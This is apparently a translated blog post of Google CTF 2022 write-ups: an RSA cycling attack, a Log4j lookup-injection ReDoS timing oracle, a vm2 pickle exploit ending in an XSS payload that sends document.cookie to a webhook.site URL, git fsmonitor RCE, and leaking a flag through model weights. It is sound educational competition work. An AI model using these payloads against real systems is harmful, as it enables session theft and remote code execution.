Google CTF 2022 WriteUps

發表於
分類於 CTF

This article is automatically translated by LLM, so the translation may be inaccurate or incomplete. If you find any mistake, please let me know.
You can find the original article here .

Participated in this year's Google CTF with XxTSJxX. I only solved some relatively simple problems, but they were quite interesting.

Problems marked with * in the title are those I attempted but didn't solve successfully during the competition and solved only after it ended.

crypto

CYCLING

This problem provided a 2048 bits RSA to solve, and it also provided an additional k=210253k=2^{1025}-3 that satisfies mek+1m(modn)m^{e^{k+1}} \equiv m \pmod{n}. Additionally, the problem provided a smaller case for testing:

e = 65537
n = 0x112b00148621
pt = 0xdeadbeef
ct = pow(pt, e, n)
pt = ct
for _ in range(209):
  # k = 209 here
  pt = pow(pt, e, n)
assert ct == pow(pt, e, n)

From mek+1m(modn)m^{e^{k+1}} \equiv m \pmod{n}, we can deduce ek+11(modλ(n))e^{k+1} \equiv 1 \pmod{\lambda(n)}.

Since e0=1e^0 = 1, k+10(modλ(λ(n)))k+1 \equiv 0 \pmod{\lambda(\lambda(n))}, meaning λ(λ(n))\lambda(\lambda(n)) divides k+1k+1.

For a normal RSA, λ(λ(n))\lambda(\lambda(n)) should not be much smaller than nn, but by factoring the small case, we can see that gcd(p1,q1)\gcd(p-1,q-1) is not small:

sage: n=0x112b00148621
sage: factor(n)
3021943 * 6246439
sage: p=3021943
sage: q=n//p
sage: factor(p-1)
2 * 3 * 7 * 11 * 31 * 211
sage: factor(q-1)
2 * 3 * 11 * 31 * 43 * 71

Additionally, λ(λ(n))=k+1=209+1\lambda(\lambda(n))=k+1=209+1 holds true, not just in terms of divisibility. Estimating the problem's n22048n \approx 2^{2048}, but k21024k \approx 2^{1024} is similar to the small case, so we can also guess that λ(λ(n))=k+1\lambda(\lambda(n))=k+1 holds true in the problem's context.

Next, we need to deduce λ(n)\lambda(n) from λ(λ(n))\lambda(\lambda(n)). Since λ(pq)=lcm(p1,q1)\lambda(pq)=\operatorname{lcm}(p-1,q-1), we can guess it is similar to the small case, so we assume its factors do not have prime powers, thus λ(pq)=pi\lambda(pq)=\prod p_i.

Then λ(λ(n))=lcm(p11,p21,)\lambda(\lambda(n))=\operatorname{lcm}(p_1-1,p_2-1,\cdots), so from the factorization of λ(λ(n))\lambda(\lambda(n)), we can infer some information about pi1p_i-1.

sage: from sage.crypto.util import carmichael_lambda
sage: carmichael_lambda(carmichael_lambda(n)).factor()
2 * 3 * 5 * 7
sage: factor(31-1)
2 * 3 * 5
sage: factor(43-1)
2 * 3 * 7
sage: factor(71-1)
2 * 5 * 7

Using FactorDB to factorize the problem's k+1=210252k+1=2^{1025}-2, we can see it also does not have prime powers. The factors are denoted as fif_i.

At this point, we just need to calculate

t=S{fi}(fSf+1)t=\prod_{S \subset \{f_i\}}(\prod_{f \in S}f+1)

to get a multiple tt of λ(n)\lambda(n). Then de1(modt)d \equiv e^{-1} \pmod{t} can be used to decrypt the flag.

Since this method can result in large numbers, adding a check to ensure fSf+1\prod_{f \in S}f+1 is prime can keep λ(t)=λ(λ(n))\lambda(t)=\lambda(\lambda(n)) while keeping the numbers manageable. However, even without this check, running it for a few minutes should yield results.

import json
from itertools import product
import gmpy2
from tqdm import tqdm
from Crypto.Util.number import isPrime

e = 65537
n = 0x99EFA9177387907EB3F74DC09A4D7A93ABF6CEB7EE102C689ECD0998975CEDE29F3CA951FEB5ADFB9282879CC666E22DCAFC07D7F89D762B9AD5532042C79060CDB022703D790421A7F6A76A50CCEB635AD1B5D78510ADF8C6FF9645A1B179E965358E10FE3DD5F82744773360270B6FA62D972D196A810E152F1285E0B8B26F5D54991D0539A13E655D752BD71963F822AFFC7A03E946CEA2C4EF65BF94706F20B79D672E64E8FAAC45172C4130BFECA9BEF71ED8C0C9E2AA0A1D6D47239960F90EF25B337255BAC9C452CB019A44115B0437726A9ADEF10A028F1E1263C97C14A1D7CD58A8994832E764FFBFCC05EC8ED3269BB0569278EEA0550548B552B1
ct = 0x339BE515121DAB503106CD190897382149E032A76A1CA0EEC74F2C8C74560B00DFFC0AD65EE4DF4F47B2C9810D93E8579517692268C821C6724946438A9744A2A95510D529F0E0195A2660ABD057D3F6A59DF3A1C9A116F76D53900E2A715DFE5525228E832C02FD07B8DAC0D488CCA269E0DBB74047CF7A5E64A06A443F7D580EE28C5D41D5EDE3604825EBA31985E96575DF2BCC2FEFD0C77F2033C04008BE9746A0935338434C16D5A68D1338EABDCF0170AC19A27EC832BF0A353934570ABD48B1FE31BC9A4BB99428D1FBAB726B284AEC27522EFB9527DDCE1106BA6A480C65F9332C5B2A3C727A2CCA6D6951B09C7C28ED0474FDC6A945076524877680
k = 2**1025 - 3

with open("fact.json", "rb") as f:
    # curl 'http://factordb.com/api?query=2^1025-2' -o fact.json
    fact = json.load(f)
fs = [gmpy2.mpz(p) for p, _ in fact["factors"]]
print(fs)
t = 1
for xx in tqdm(product([0, 1], repeat=len(fs)), total=2 ** len(fs)):
    s = 1
    for x, y in zip(xx, fs):
        if x:
            s *= y
    if isPrime(s + 1):
        t *= s + 1
d = gmpy2.invert(e, t)
pt = gmpy2.powmod(ct, d, n)
print(int(pt).to_bytes((int(pt).bit_length() + 7) // 8, "big"))
# CTF{Recycling_Is_Great}

My method seems to differ slightly from the intended solution. The first half of the concept is similar, but the latter half is different. The difference lies in using fif_i to try to find multiples of p1p-1 or q1q-1, then using a method similar to Pollard's p1p-1 to keep the numbers within a certain range, making it faster to execute.

import json
from itertools import combinations, product
from functools import reduce
from operator import mul
import gmpy2
from tqdm import tqdm
from Crypto.Util.number import isPrime

e = 65537
n = 0x99EFA9177387907EB3F74DC09A4D7A93ABF6CEB7EE102C689ECD0998975CEDE29F3CA951FEB5ADFB9282879CC666E22DCAFC07D7F89D762B9AD5532042C79060CDB022703D790421A7F6A76A50CCEB635AD1B5D78510ADF8C6FF9645A1B179E965358E10FE3DD5F82744773360270B6FA62D972D196A810E152F1285E0B8B26F5D54991D0539A13E655D752BD71963F822AFFC7A03E946CEA2C4EF65BF94706F20B79D672E64E8FAAC45172C4130BFECA9BEF71ED8C0C9E2AA0A1D6D47239960F90EF25B337255BAC9C452CB019A44115B0437726A9ADEF10A028F1E1263C97C14A1D7CD58A8994832E764FFBFCC05EC8ED3269BB0569278EEA0550548B552B1
ct = 0x339BE515121DAB503106CD190897382149E032A76A1CA0EEC74F2C8C74560B00DFFC0AD65EE4DF4F47B2C9810D93E8579517692268C821C6724946438A9744A2A95510D529F0E0195A2660ABD057D3F6A59DF3A1C9A116F76D53900E2A715DFE5525228E832C02FD07B8DAC0D488CCA269E0DBB74047CF7A5E64A06A443F7D580EE28C5D41D5EDE3604825EBA31985E96575DF2BCC2FEFD0C77F2033C04008BE9746A0935338434C16D5A68D1338EABDCF0170AC19A27EC832BF0A353934570ABD48B1FE31BC9A4BB99428D1FBAB726B284AEC27522EFB9527DDCE1106BA6A480C65F9332C5B2A3C727A2CCA6D6951B09C7C28ED0474FDC6A945076524877680
k = 2**1025 - 3

with open("fact.json", "rb") as f:
    # curl 'http://factordb.com/api?query=2^1025-2' -o fact.json
    fact = json.load(f)
fs = [gmpy2.mpz(p) for p, _ in fact["factors"]]
print(fs)


def factor():
    cur = 2
    # for xx in tqdm(product([0, 1], repeat=len(fs)), total=2 ** len(fs)):
    #     s = gmpy2.mpz(1)
    #     for x, y in zip(xx, fs):
    #         if x:
    #             s *= y
    #     if isPrime(s + 1):
    #         cur = gmpy2.powmod(cur, s + 1, n)
    #         g = gmpy2.gcd(cur - 1, n)
    #         if 1 < g < n:
    #             p = g
    #             q = n // p
    #             return p, q

    # better version
    for i in range(1, len(fs)):
        for c in combinations(fs, i):
            s = reduce(mul, c)
            if isPrime(s + 1):
                cur = gmpy2.powmod(cur, s + 1, n)
                g = gmpy2.gcd(cur - 1, n)
                if 1 < g < n:
                    p = g
                    q = n // p
                    return p, q


p, q = factor()
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
pt = gmpy2.powmod(ct, d, n)
print(int(pt).to_bytes((int(pt).bit_length() + 7) // 8, "big"))
# CTF{Recycling_Is_Great}

web

LOG4J2

The previous problem, LOG4J, had a place where you could directly use ${date:${env:FLAG}} to get the flag from the error message. (by @splitline)

The difference with LOG4J2 is that when it encounters an error message, the message is replaced with Sensitive information detected in output. Censored for security reasons. So a different method is needed.

The relevant parts of the Log4j official documentation are:

In the Pattern Layout, there is replace{pattern}{regex}{substitution}, so it might be possible to use regex to match the flag and use blind detection to leak it character by character.

When I tested, I couldn't figure out how to make it generate an error when matching the regex, as Pattern Layouts cannot be nested within other Pattern Layouts. Also, the execution order seems to be Lookups first, then Pattern Layouts, so ${date:%replace...} is not possible.

Later, I realized that regex itself can use REDOS to generate different timings, allowing us to determine the flag. The regex I used looks like this:

%replace{S${env:FLAG}E}{^SCTF.a((((((((((((((((((((.)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*E$}{}

If the a matches, it will cause the server to timeout (10s) due to extensive backtracking. If it doesn't match, the regex engine won't attempt the extensive backtracking, so the response will return quickly.

import httpx
import asyncio
import string


async def is_ok(client: httpx.AsyncClient, c: str):
    try:
        await client.post(
            "https://log4j2-web.2022.ctfcompetition.com/",
            data={
                "text": "%replace{S${env:FLAG}E}{^SCTF."
                + c
                + "((((((((((((((((((((.)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*)*E$}{}"
            },
            timeout=3,
        )
        return False
    except:
        return True


async def main():
    async with httpx.AsyncClient(http2=True) as client:
        chrs = string.ascii_lowercase + "-"
        print(chrs)
        flag = ""
        while not flag.endswith("}"):
            res = await asyncio.gather(*[is_ok(client, flag + c) for c in chrs])
            print(res)
            if all([not r for r in res]):
                flag += "}"
            else:
                flag += [c for c, r in zip(chrs, res) if r][0]
            print("CTF{" + flag)


asyncio.run(main())
# CTF{and-you-thought-it-was-over-didnt-you}

*HORKOS

Couldn't solve this during the competition QQ

This problem is about finding a vulnerability in shoplib.mjs. On the server side, it accepts a JSON string cart and passes it to sendOrder(value, orders), then redirects the mutated orders to /order#b64 after JSON + base64 encoding, and also sends the URL to an XSS bot.

For XSS, if any JSON key in orders can appear as an array, it can be achieved:

const escapeHtml = (str) => str.includes('<') ? str.replace(/</g, c => `&#${c.charCodeAt()};`) : str;
const renderLines = (arr) => arr.reduce((p,c) => p+`
<div class="row">
<div class="col-xl-8">
  <p>${escapeHtml(c.key).toString()}</p>
</div>
<div class="col-xl-2">
  <p class="float-end">${escapeHtml(getValue(c.value, 'quantity').toString())}
  </p>
</div>
<div class="col-xl-2">
  <p class="float-end">${escapeHtml(getValue(c.value, 'price').toString())}
  </p>
</div>
<hr>
</div>`, '');

However, looking at its logic, there is no normal way to achieve this directly. But since the server runs this script in vm2, it hints that we need RCE in vm2. The key part is in its implementation of pickle:

export const pickle = {
    PRIMITIVES: ['String', 'Number', 'Boolean'],
    loads: json => {
        const obj = {};
        for (const {key, type, value} of json) {
            if (type.match(/^pickled/)) {
                obj[key] = pickle.loads(value);
                const constructor = type.replace(/^pickled/, '');
                obj[key].__proto__ = (globalThis[constructor]||module[constructor]).prototype;
            } else {
                obj[key] = new globalThis[type](value);
            }
        }
        return obj;
    },
    dumps: obj => {
        const json = [];
        for (const key in obj) {
            const value = obj[key];
            const type = value.constructor.name;
            if (typeof type !== 'string') continue;
            if (typeof value == 'object' && !pickle.PRIMITIVES.includes(type)) {
                json.push({
                    key,
                    type: 'pickled' + type,
                    value: pickle.dumps(value)
                });
            } else if (typeof value !== 'undefined') {
                json.push({
                    key,
                    type,
                    value: globalThis[type].prototype.valueOf.call(value)
                });
            }
        }
        return json;
    }
};

There is obj[key] = new globalThis[type](value); which looks useful, but type === 'eval' results in Uncaught TypeError: globalThis.eval is not a constructor, so we can only use type === 'Function' to create a new function and see how to make it call the newly created function.

During the competition, I tried to find points where toString, valueOf, then, toJSON might be called, but couldn't find any. After the competition, I found out that async sendOrder() returns this.order.orderId, and app.js does let result = await vm.run(script);. So if orderId is { then: Function('pwned') }, it will call the function.

This allows RCE, and although vm2 has protections in this part, it is enough to control key to become an array for XSS.

Setting a breakpoint in devtools and executing this code before submitting will allow the bot to XSS:

cart.value=JSON.stringify([{"key":"0","type":"pickledShoppingCart","value":[{"key":"items","type":"pickledObject","value":[{"key":"Tomato","type":"pickledItem","value":[{"key":"price","type":"Number","value":10},{"key":"quantity","type":"String","value":"0"}]}]},{"key":"address","type":"pickledAddress","value":[{"key":"street","type":"String","value":""},{"key":"number","type":"Number","value":0},{"key":"zip","type":"Number","value":0}]},{"key":"shoppingCartId","type":"pickledObject","value":[{"key":"then","type":"Function","value":"console.log(orders[0][0].value[0].value[0].key=['<img src=1 onerror=\"(new Image).src=`https://webhook.site/73aaf079-7c60-4b19-99a8-9b84680f615f?`+document.cookie\">']);arguments[0]()"}]}]}])

misc

LEGIT

This problem allows providing a URL for the server to git clone, then list directories, change directories, and execute git fetch. It's clear that using git's fsmonitor to get RCE is the way to go, referencing Git honours embedded bare repos, and exploitation via core.fsmonitor in a directory's .git/config affects IDEs, shell prompts and Git pillagers.

There is a POC - Burying a malicious bare repo within a regular repo with a complete process that can be followed. Just follow its instructions to create a repo for the server to clone, then use RCE to get the flag.

OCR

This problem runs a Keras model on the server as follows:

# The network is pretty tiny, as it has to run on a potato.
model = Sequential()
model.add(Flatten(input_shape=(16,16,3)))
# I'm sure we can compress it all down to four numbers.
model.add(Dense(4, activation='relu'))
model.add(Dense(128, activation='softmax'))

The input is a 16x16x3 image, flattened and passed through a hidden layer with only four neurons, outputting which of the 128 ASCII characters it is:

results = model.predict(image_data)
s = ""
for row in results:
    k = "?"
    for i, v in enumerate(row):
        if v > 0.5:
            k = chr(i)
    s += k
print("The neural network sees:", repr(s))

The model's weights can be set, but since the model is too small, it's not feasible to train a model of the same size for recognition, and the dataset only provides images for the first four characters of the flag CTF{.

My approach was to control the weights to leak the pixels of the image. First, note that Dense is equivalent to Activation(Ax+B)\operatorname{Activation}(Ax+B), so the entire model performs this calculation:

y=Softmax(CReLU(Ax+B)+D)y=\operatorname{Softmax}(C\operatorname{ReLU}(Ax+B)+D)

where xx is the flattened input, a 768×1768 \times 1 matrix.

The 11 here is actually the batch size, but let's ignore it for now.

So AA is 4×7684 \times 768, BB is 4×14 \times 1, CC is 128×4128 \times 4, and DD is 128×1128 \times 1.

From the dataset, we can see that the input images have only three colors, so every three values in xx represent the color of one pixel. To read the first pixel, set A0,0,A0,1,A0,2A_{0,0},A_{0,1},A_{0,2} to some value tt, then (Ax+B)0=t(x0+x1+x2)(Ax+B)_{0}=t(x_0+x_1+x_2).

Assuming the value is positive, ReLU\operatorname{ReLU} has no effect, so setting C0,0=1C_{0,0}=1 results in (C(Ax+B)+D)0=t(x0+x1+x2)(C(Ax+B)+D)_0=t(x_0+x_1+x_2).

By controlling tt to make t(x0+x1+x2)t(x_0+x_1+x_2) exceed 0.5 after softmax, we can determine if the color is the same. Calculating exex+127=0.5\frac{e^x}{e^x+127}=0.5 gives x4.84x \approx 4.84, and x0+x1+x2x_0+x_1+x_2 is roughly 1.51.5 on average, so tt should be around 33.

If tt doesn't distinguish the color, try a few different values of tt.

import os

os.environ["PWNLIB_NOTERM"] = "1"
# from pwnlib.tubes.process import process
from pwn import process, remote, context
from subprocess import check_output

context.log_level = "error"
import ast
from PIL import Image
import random
from tqdm import tqdm
from multiprocessing import Pool
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor, as_completed


def rand_color():
    return tuple([random.randrange(256) for _ in range(3)])


def solve_pow(cmd):
    return check_output(cmd, shell=True, executable="/bin/bash").strip()

def connect_one(i):
    io = remote("ocr.2022.ctfcompetition.com", 1337)
    io.recvuntil(b"with:\n")
    cmd = io.recvlineS().strip()
    cmd = cmd.replace(
            "python3 <(curl -sSL https://goo.gle/kctf-pow)", "~/.cargo/bin/kctf-pow"
        )
    print(i, cmd, flush=True)
    out = solve_pow(cmd)
    print(i, out, flush=True)
    io.sendline(out)
    return io


def clear_weights(io):
    io.sendlineafter(b"Menu:", b"0")


def set_weight(io, *args):
    io.sendlineafter(b"Menu:", b"1")
    io.sendlineafter(b":", " ".join(map(str, args)).encode())


def read_flag(io):
    io.sendlineafter(b"Menu:", b"2")
    io.recvuntil(b"sees: ")
    s = ast.literal_eval(io.recvlineS())
    return s


def read_pixel(io, i, mul):
    clear_weights(io)
    # weight matrix is transposed
    set_weight(io, 2, 0, 0, 1)
    set_weight(io, 0, 3 * i, 0, mul)
    set_weight(io, 0, 3 * i + 1, 0, mul)
    set_weight(io, 0, 3 * i + 2, 0, mul)
    return read_flag(io)


# io = connect()
# flaglen = 4
flaglen = 34
dt = [[None] * (16 * 16) for _ in range(flaglen)]


def handle(io, rg, pbar):
    for i in rg:
        # print(i)
        muls = [1.5,1.8,2.1,2.4,2.7,3.0,3.3,3.5,3.8]
        fs = [read_pixel(io, i, m) for m in muls]
        for j in range(flaglen):
            dt[j][i] = tuple([f[j] for f in fs])
            # print(i,*dt[i])
        pbar.update(1)
    io.close()


n_conn = 64
with ProcessPoolExecutor(max_workers=8) as ex:
    futures = [ex.submit(connect_one, i) for i in range(n_conn)]
    ios = [f.result() for f in futures]
print('DONE CONN')
with tqdm(total=16 * 16) as pbar:
    with ThreadPoolExecutor(max_workers=n_conn) as ex:
        futures = [
            ex.submit(
                handle, ios[i // (256 // n_conn)], list(range(i, i + 256 // n_conn)), pbar
            )
            for i in range(0, 16 * 16, 256 // n_conn)
        ]

for k in range(flaglen):
    print(k, set(dt[k]))
    if len(set(dt[k])) <= 3:
        colors = [(128, 0, 0), (0, 128, 0), (0, 0, 128)]
        cmap = {x: y for x, y in zip(set(dt[k]), colors)}
        img = Image.new("RGB", (16, 16))
        pixels = img.load()
        for i in range(16 * 16):
            pixels[i % 16, i // 16] = cmap[dt[k][i]]
        img.save(f"flag_out/flag_{k}.png")
        print(f"get flag {k}")
# CTF{n0_l3aky_ReLU_y3t_5till_le4ky}

My script can only correctly leak part of the characters, but the missing characters can be guessed. You can also refer to someone else's writeup, which is better written and more stable in exploitation.